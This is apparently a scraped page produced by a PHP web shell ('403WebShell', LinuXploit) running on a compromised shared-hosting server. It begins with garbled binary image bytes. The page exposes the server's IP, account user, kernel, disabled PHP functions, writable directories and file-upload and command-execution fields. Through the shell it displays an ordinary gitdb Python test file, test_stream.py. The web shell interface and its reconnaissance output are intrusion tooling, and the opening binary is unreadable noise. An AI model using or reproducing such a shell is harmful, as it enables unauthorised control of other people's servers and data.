JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 91.108.119.87  /  Your IP : 216.73.217.129
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/gitdb/test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/gitdb/test/test_stream.py
# Copyright (C) 2010, 2011 Sebastian Thiel (byronimo@gmail.com) and contributors
#
# This module is part of GitDB and is released under
# the New BSD License: http://www.opensource.org/licenses/bsd-license.php
"""Test for object db"""

from gitdb.test.lib import (
    TestBase,
    DummyStream,
    make_bytes,
    make_object,
    fixture_path
)

from gitdb import (
    DecompressMemMapReader,
    FDCompressedSha1Writer,
    LooseObjectDB,
    Sha1Writer,
    MemoryDB,
    IStream,
)
from gitdb.util import hex_to_bin

import zlib
from gitdb.typ import (
    str_blob_type
)

import tempfile
import os
from io import BytesIO


class TestStream(TestBase):

    """Test stream classes"""

    data_sizes = (15, 10000, 1000 * 1024 + 512)

    def _assert_stream_reader(self, stream, cdata, rewind_stream=lambda s: None):
        """Make stream tests - the orig_stream is seekable, allowing it to be
        rewound and reused
        :param cdata: the data we expect to read from stream, the contents
        :param rewind_stream: function called to rewind the stream to make it ready
            for reuse"""
        ns = 10
        assert len(cdata) > ns - 1, "Data must be larger than %i, was %i" % (ns, len(cdata))

        # read in small steps
        ss = len(cdata) // ns
        for i in range(ns):
            data = stream.read(ss)
            chunk = cdata[i * ss:(i + 1) * ss]
            assert data == chunk
        # END for each step
        rest = stream.read()
        if rest:
            assert rest == cdata[-len(rest):]
        # END handle rest

        if isinstance(stream, DecompressMemMapReader):
            assert len(stream.data()) == stream.compressed_bytes_read()
        # END handle special type

        rewind_stream(stream)

        # read everything
        rdata = stream.read()
        assert rdata == cdata

        if isinstance(stream, DecompressMemMapReader):
            assert len(stream.data()) == stream.compressed_bytes_read()
        # END handle special type

    def test_decompress_reader(self):
        for close_on_deletion in range(2):
            for with_size in range(2):
                for ds in self.data_sizes:
                    cdata = make_bytes(ds, randomize=False)

                    # zdata = zipped actual data
                    # cdata = original content data

                    # create reader
                    if with_size:
                        # need object data
                        zdata = zlib.compress(make_object(str_blob_type, cdata))
                        typ, size, reader = DecompressMemMapReader.new(zdata, close_on_deletion)
                        assert size == len(cdata)
                        assert typ == str_blob_type

                        # even if we don't set the size, it will be set automatically on first read
                        test_reader = DecompressMemMapReader(zdata, close_on_deletion=False)
                        assert test_reader._s == len(cdata)
                    else:
                        # here we need content data
                        zdata = zlib.compress(cdata)
                        reader = DecompressMemMapReader(zdata, close_on_deletion, len(cdata))
                        assert reader._s == len(cdata)
                    # END get reader

                    self._assert_stream_reader(reader, cdata, lambda r: r.seek(0))

                    # put in a dummy stream for closing
                    dummy = DummyStream()
                    reader._m = dummy

                    assert not dummy.closed
                    del(reader)
                    assert dummy.closed == close_on_deletion
                # END for each datasize
            # END whether size should be used
        # END whether stream should be closed when deleted

    def test_sha_writer(self):
        writer = Sha1Writer()
        assert 2 == writer.write(b"hi")
        assert len(writer.sha(as_hex=1)) == 40
        assert len(writer.sha(as_hex=0)) == 20

        # make sure it does something ;)
        prev_sha = writer.sha()
        writer.write(b"hi again")
        assert writer.sha() != prev_sha

    def test_compressed_writer(self):
        for ds in self.data_sizes:
            fd, path = tempfile.mkstemp()
            ostream = FDCompressedSha1Writer(fd)
            data = make_bytes(ds, randomize=False)

            # for now, just a single write, code doesn't care about chunking
            assert len(data) == ostream.write(data)
            ostream.close()

            # its closed already
            self.assertRaises(OSError, os.close, fd)

            # read everything back, compare to data we zip
            fd = os.open(path, os.O_RDONLY | getattr(os, 'O_BINARY', 0))
            written_data = os.read(fd, os.path.getsize(path))
            assert len(written_data) == os.path.getsize(path)
            os.close(fd)
            assert written_data == zlib.compress(data, 1)   # best speed

            os.remove(path)
        # END for each os

    def test_decompress_reader_special_case(self):
        odb = LooseObjectDB(fixture_path('objects'))
        mdb = MemoryDB()
        for sha in (b'888401851f15db0eed60eb1bc29dec5ddcace911',
                    b'7bb839852ed5e3a069966281bb08d50012fb309b',):
            ostream = odb.stream(hex_to_bin(sha))

            # if there is a bug, we will be missing one byte exactly !
            data = ostream.read()
            assert len(data) == ostream.size

            # Putting it back in should yield nothing new - after all, we have
            dump = mdb.store(IStream(ostream.type, ostream.size, BytesIO(data)))
            assert dump.hexsha == sha
        # end for each loose object sha to test

Youez - 2016 - github.com/yon3zu
LinuXploit